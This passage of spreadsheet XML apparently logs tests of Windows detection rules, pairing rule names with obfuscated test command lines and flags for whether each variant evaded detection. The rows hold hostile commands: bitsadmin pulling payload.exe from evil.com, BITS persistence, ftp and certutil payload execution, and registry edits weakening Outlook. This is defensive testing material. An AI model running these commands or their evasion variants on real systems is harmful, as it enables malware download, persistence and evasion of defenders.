      <c r="K1723" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1724" ht="15.75" customHeight="1" s="42">
      <c r="A1724" s="43" t="n"/>
      <c r="B1724" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C1724" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D1724" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E1724" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob /DoWNlOAd /"priority" high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F1724" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1724" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1724" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1724" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1724" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1724" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1725" ht="15.75" customHeight="1" s="42">
      <c r="A1725" s="43" t="n"/>
      <c r="B1725" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C1725" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D1725" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E1725" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob /dOWnloAd /PriOrIty high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F1725" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1725" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1725" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1725" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1725" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1725" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1726" ht="15.75" customHeight="1" s="42">
      <c r="A1726" s="43" t="n"/>
      <c r="B1726" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C1726" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D1726" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E1726" s="36" t="inlineStr">
        <is>
          <t>bitsadmin -"transfer" myJob /DOWNLOAd -"priority" high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F1726" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1726" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1726" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1726" s="43" t="n"/>
      <c r="J1726" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1726" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1727" ht="15.75" customHeight="1" s="42">
      <c r="A1727" s="43" t="n"/>
      <c r="B1727" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C1727" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D1727" s="43" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E1727" s="43" t="inlineStr">
        <is>
          <t>bitsadmin -"transfer" myJob /doWnLoAD /pRiOrIty high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F1727" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1727" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1727" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1727" s="43" t="n"/>
      <c r="J1727" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1727" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1728" ht="15.75" customHeight="1" s="42">
      <c r="A1728" s="36" t="n"/>
      <c r="B1728" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C1728" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D1728" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E1728" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /tRaNSFER myJob -"download" /PRIoritY high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F1728" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1728" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1728" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1728" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1728" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1728" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1729" ht="15.75" customHeight="1" s="42">
      <c r="A1729" s="36" t="n"/>
      <c r="B1729" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C1729" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D1729" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E1729" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob -"download" /priority high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F1729" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1729" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1729" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1729" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1729" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1729" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1730" ht="15.75" customHeight="1" s="42">
      <c r="A1730" s="36" t="n"/>
      <c r="B1730" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C1730" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D1730" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E1730" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /TranSfER myJob /"download" -"priority" high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F1730" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1730" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1730" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1730" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1730" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1730" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1731" ht="15.75" customHeight="1" s="42">
      <c r="A1731" s="36" t="n"/>
      <c r="B1731" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C1731" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D1731" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E1731" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob -"download" /PrIoritY high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F1731" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1731" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1731" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1731" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1731" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1731" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1732" ht="15.75" customHeight="1" s="42">
      <c r="A1732" s="36" t="n"/>
      <c r="B1732" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_uncommon_targetfolder</t>
        </is>
      </c>
      <c r="C1732" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To An Uncommon Target Folder</t>
        </is>
      </c>
      <c r="D1732" s="36" t="inlineStr">
        <is>
          <t>6e30c82f-a9f8-4aab-b79c-7c12bce6f248</t>
        </is>
      </c>
      <c r="E1732" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob http://example.com/payload.exe C:\Windows\System32\drivers\etc\payload.exe</t>
        </is>
      </c>
      <c r="F1732" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1732" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1732" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1732" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1732" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1732" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1733" ht="15.75" customHeight="1" s="42">
      <c r="A1733" s="36" t="n"/>
      <c r="B1733" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_uncommon_targetfolder</t>
        </is>
      </c>
      <c r="C1733" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To An Uncommon Target Folder</t>
        </is>
      </c>
      <c r="D1733" s="36" t="inlineStr">
        <is>
          <t>6e30c82f-a9f8-4aab-b79c-7c12bce6f248</t>
        </is>
      </c>
      <c r="E1733" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /"transfer" myJob http://example.com/payload.exe C:\Windows\System32\drivers\etc\payload.exe</t>
        </is>
      </c>
      <c r="F1733" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1733" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1733" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1733" s="43" t="n"/>
      <c r="J1733" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1733" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1734" ht="15.75" customHeight="1" s="42">
      <c r="A1734" s="36" t="n"/>
      <c r="B1734" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_uncommon_targetfolder</t>
        </is>
      </c>
      <c r="C1734" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To An Uncommon Target Folder</t>
        </is>
      </c>
      <c r="D1734" s="36" t="inlineStr">
        <is>
          <t>6e30c82f-a9f8-4aab-b79c-7c12bce6f248</t>
        </is>
      </c>
      <c r="E1734" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /TRAnsfER myJob http://example.com/payload.exe C:\Windows\System32\drivers\etc\payload.exe</t>
        </is>
      </c>
      <c r="F1734" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1734" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1734" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1734" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1734" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1734" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1735" ht="15.75" customHeight="1" s="42">
      <c r="A1735" s="36" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B1735" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_potential_persistence</t>
        </is>
      </c>
      <c r="C1735" s="36" t="inlineStr">
        <is>
          <t>Monitoring For Persistence Via BITS</t>
        </is>
      </c>
      <c r="D1735" s="36" t="inlineStr">
        <is>
          <t>b9cbbc17-d00d-4e3d-a827-b06d03d2380d</t>
        </is>
      </c>
      <c r="E1735" s="36" t="inlineStr">
        <is>
          <t>bitsadmin.exe "/addfile" AtomicBITS h"tt"ps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Users\Public\T1197.ps1</t>
        </is>
      </c>
      <c r="F1735" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1735" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1735" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1735" s="43" t="n"/>
      <c r="J1735" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1735" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1736" ht="15.75" customHeight="1" s="42">
      <c r="A1736" s="36" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B1736" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_potential_persistence</t>
        </is>
      </c>
      <c r="C1736" s="36" t="inlineStr">
        <is>
          <t>Monitoring For Persistence Via BITS</t>
        </is>
      </c>
      <c r="D1736" s="36" t="inlineStr">
        <is>
          <t>b9cbbc17-d00d-4e3d-a827-b06d03d2380d</t>
        </is>
      </c>
      <c r="E1736" s="36" t="inlineStr">
        <is>
          <t>bitsadmin.exe "/SetNotifyCmdLine" AtomicBITS powershell.exe "-Command Start-Process calc.exe"</t>
        </is>
      </c>
      <c r="F1736" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1736" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1736" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1736" s="43" t="n"/>
      <c r="J1736" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1736" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1737" ht="15.75" customHeight="1" s="42">
      <c r="A1737" s="36" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B1737" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_potential_persistence</t>
        </is>
      </c>
      <c r="C1737" s="36" t="inlineStr">
        <is>
          <t>Monitoring For Persistence Via BITS</t>
        </is>
      </c>
      <c r="D1737" s="36" t="inlineStr">
        <is>
          <t>b9cbbc17-d00d-4e3d-a827-b06d03d2380d</t>
        </is>
      </c>
      <c r="E1737" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Start-BitsTransfer -Source 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md' -Destination 'C:\Users\Public\T1197.ps1'"</t>
        </is>
      </c>
      <c r="F1737" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1737" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1737" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1737" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1737" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1737" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1738" ht="15.75" customHeight="1" s="42">
      <c r="A1738" s="36" t="n"/>
      <c r="B1738" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmdl32_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C1738" s="36" t="inlineStr">
        <is>
          <t>Potential Arbitrary File Download Via Cmdl32.EXE</t>
        </is>
      </c>
      <c r="D1738" s="36" t="inlineStr">
        <is>
          <t>f37aba28-a9e6-4045-882c-d5004043b337</t>
        </is>
      </c>
      <c r="E1738" s="36" t="inlineStr">
        <is>
          <t>cmdl32.exe -vpn -lan C:\path\to\config.txt</t>
        </is>
      </c>
      <c r="F1738" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1738" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1738" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1738" s="43" t="n"/>
      <c r="J1738" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1738" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1739" ht="15.75" customHeight="1" s="42">
      <c r="A1739" s="36" t="n"/>
      <c r="B1739" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_legacy_option</t>
        </is>
      </c>
      <c r="C1739" s="36" t="inlineStr">
        <is>
          <t>Suspicious High IntegrityLevel Conhost Legacy Option</t>
        </is>
      </c>
      <c r="D1739" s="36" t="inlineStr">
        <is>
          <t>3037d961-21e9-4732-b27a-637bcc7bf539</t>
        </is>
      </c>
      <c r="E1739" s="36" t="inlineStr">
        <is>
          <t>conhost 0xffffffff -ForceV1</t>
        </is>
      </c>
      <c r="F1739" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1739" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1739" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1739" s="43" t="n"/>
      <c r="J1739" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1739" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1740" ht="15.75" customHeight="1" s="42">
      <c r="A1740" s="36" t="n"/>
      <c r="B1740" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ftp_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C1740" s="36" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Via FTP.EXE</t>
        </is>
      </c>
      <c r="D1740" s="36" t="inlineStr">
        <is>
          <t>06b401f4-107c-4ff9-947f-9ec1e7649f1e</t>
        </is>
      </c>
      <c r="E1740" s="36" t="inlineStr">
        <is>
          <t>echo !calc.exe &gt; script.txt &amp;&amp; ftp -A &lt; script.txt</t>
        </is>
      </c>
      <c r="F1740" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1740" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1740" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1740" s="43" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d); Potential Arbitrary Command Execution Via FTP.EXE (06b401f4-107c-4ff9-947f-9ec1e7649f1e)</t>
        </is>
      </c>
      <c r="J1740" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1740" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1741" ht="15.75" customHeight="1" s="42">
      <c r="A1741" s="36" t="n"/>
      <c r="B1741" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ftp_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C1741" s="36" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Via FTP.EXE</t>
        </is>
      </c>
      <c r="D1741" s="36" t="inlineStr">
        <is>
          <t>06b401f4-107c-4ff9-947f-9ec1e7649f1e</t>
        </is>
      </c>
      <c r="E1741" s="36" t="inlineStr">
        <is>
          <t>echo !calc.exe &gt; script.txt &amp;&amp; ftp -a &lt; script.txt</t>
        </is>
      </c>
      <c r="F1741" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1741" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1741" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1741" s="43" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d); Potential Arbitrary Command Execution Via FTP.EXE (06b401f4-107c-4ff9-947f-9ec1e7649f1e)</t>
        </is>
      </c>
      <c r="J1741" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1741" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1742" ht="15.75" customHeight="1" s="42">
      <c r="A1742" s="36" t="n"/>
      <c r="B1742" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ftp_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C1742" s="36" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Via FTP.EXE</t>
        </is>
      </c>
      <c r="D1742" s="36" t="inlineStr">
        <is>
          <t>06b401f4-107c-4ff9-947f-9ec1e7649f1e</t>
        </is>
      </c>
      <c r="E1742" s="36" t="inlineStr">
        <is>
          <t>echo !calc.exe &gt; script.txt &amp;&amp; ftp -"A" &lt; script.txt</t>
        </is>
      </c>
      <c r="F1742" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1742" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1742" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1742" s="43" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d)</t>
        </is>
      </c>
      <c r="J1742" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1742" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1743" ht="15.75" customHeight="1" s="42">
      <c r="A1743" s="36" t="n"/>
      <c r="B1743" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ftp_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C1743" s="36" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Via FTP.EXE</t>
        </is>
      </c>
      <c r="D1743" s="36" t="inlineStr">
        <is>
          <t>06b401f4-107c-4ff9-947f-9ec1e7649f1e</t>
        </is>
      </c>
      <c r="E1743" s="36" t="inlineStr">
        <is>
          <t>echo !calc.exe &gt; script.txt &amp;&amp; ftp /"A" &lt; script.txt</t>
        </is>
      </c>
      <c r="F1743" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1743" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1743" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1743" s="43" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d)</t>
        </is>
      </c>
      <c r="J1743" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1743" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1744" ht="15.75" customHeight="1" s="42">
      <c r="A1744" s="36" t="n"/>
      <c r="B1744" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_zipexec</t>
        </is>
      </c>
      <c r="C1744" s="36" t="inlineStr">
        <is>
          <t>Suspicious ZipExec Execution</t>
        </is>
      </c>
      <c r="D1744" s="36" t="inlineStr">
        <is>
          <t>90dcf730-1b71-4ae7-9ffc-6fcf62bd0132</t>
        </is>
      </c>
      <c r="E1744" s="36" t="inlineStr">
        <is>
          <t>copy payload.zip payload.txt &amp;&amp; certutil -decodehex payload.txt payload.exe</t>
        </is>
      </c>
      <c r="F1744" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1744" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1744" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1744" s="43" t="n"/>
      <c r="J1744" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1744" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1745" ht="15.75" customHeight="1" s="42">
      <c r="A1745" s="36" t="n"/>
      <c r="B1745" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_runscripthelper</t>
        </is>
      </c>
      <c r="C1745" s="36" t="inlineStr">
        <is>
          <t>Suspicious Runscripthelper.exe</t>
        </is>
      </c>
      <c r="D1745" s="36" t="inlineStr">
        <is>
          <t>eca49c87-8a75-4f13-9c73-a5a29e845f03</t>
        </is>
      </c>
      <c r="E1745" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\WinSxS\amd64_microsoft-windows-s..nner-kiosk-assigned_31bf3856ad364e35_10.0.19041.1_none_82fc8e33230a1099\Runscripthelper.exe C:\temp\runner.exe &amp;&amp; C:\temp\runner.exe surfacecheck C:\temp\payload.ps1</t>
        </is>
      </c>
      <c r="F1745" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1745" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1745" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1745" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1745" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1745" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1746" ht="15.75" customHeight="1" s="42">
      <c r="A1746" s="36" t="n"/>
      <c r="B1746" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_runscripthelper</t>
        </is>
      </c>
      <c r="C1746" s="36" t="inlineStr">
        <is>
          <t>Suspicious Runscripthelper.exe</t>
        </is>
      </c>
      <c r="D1746" s="36" t="inlineStr">
        <is>
          <t>eca49c87-8a75-4f13-9c73-a5a29e845f03</t>
        </is>
      </c>
      <c r="E1746" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\runscripthelper.exe C:\Windows\Temp\not_suspicious.exe &amp;&amp; C:\Windows\Temp\not_suspicious.exe surfacecheck C:\path\to\script.ps1 C:\Windows\Temp</t>
        </is>
      </c>
      <c r="F1746" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1746" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1746" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1746" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1746" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1746" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1747" ht="15.75" customHeight="1" s="42">
      <c r="A1747" s="36" t="n"/>
      <c r="B1747" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C1747" s="36" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D1747" s="36" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E1747" s="36" t="inlineStr">
        <is>
          <t>set "p1=EnableUnsafe" &amp;&amp; set "p2=ClientMailRules" &amp;&amp; reg add "HKCU\Software\Policies\Microsoft\Office\16.0\Outlook\Security" /v %p1%%p2% /t REG_DWORD /d 1 /f</t>
        </is>
      </c>
      <c r="F1747" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1747" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1747" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1747" s="36" t="n"/>
      <c r="J1747" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1747" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1748" ht="15.75" customHeight="1" s="42">
      <c r="A1748" s="36" t="n"/>
      <c r="B1748" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C1748" s="36" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D1748" s="36" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E1748" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\16.0\Outlook\Security' -Name 'EnableUnsafeClientMailRules' -Value 1 -PropertyType DWORD"</t>
        </is>
      </c>
      <c r="F1748" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1748" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1748" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1748" s="36" t="n"/>
